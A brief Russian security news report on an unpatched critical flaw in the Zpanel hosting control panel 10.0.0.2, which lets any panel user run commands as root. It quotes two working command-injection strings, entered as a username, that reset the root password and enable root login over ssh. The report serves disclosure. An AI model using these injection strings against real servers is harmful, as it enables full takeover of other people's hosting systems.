В открытой панели управления хостингом Zpanel выявлена критическая уязвимость, позволяющая любому пользователю, имеющему доступ к интерфейсу панели управления (в том числе клиентам и реселлерам), выполнить произвольные команды на сервере с правами пользователя root. Ошибка вызвана сочетанием отсутствия должных проверок входящих значений с наличием средств для выполнения произвольных операций с правами пользователя root.

В частности, пользователь может поменять пароль root указав вместо имени пользователя «;/etc/zpanel/panel/bin/zsudo «echo ‘newpassword'» «| passwd —stdin root» #», а затем включить возможность входа пользователем root по ssh указав «;/etc/zpanel/panel/bin/zsudo sed ‘-i «s/#*(PermitRootLogin)/1 yes
#/» /etc/ssh/*hd*g’ #». Проблема пока остаётся неисправленной и присутствует в последнем стабильном выпуске Zpanel 10.0.0.2.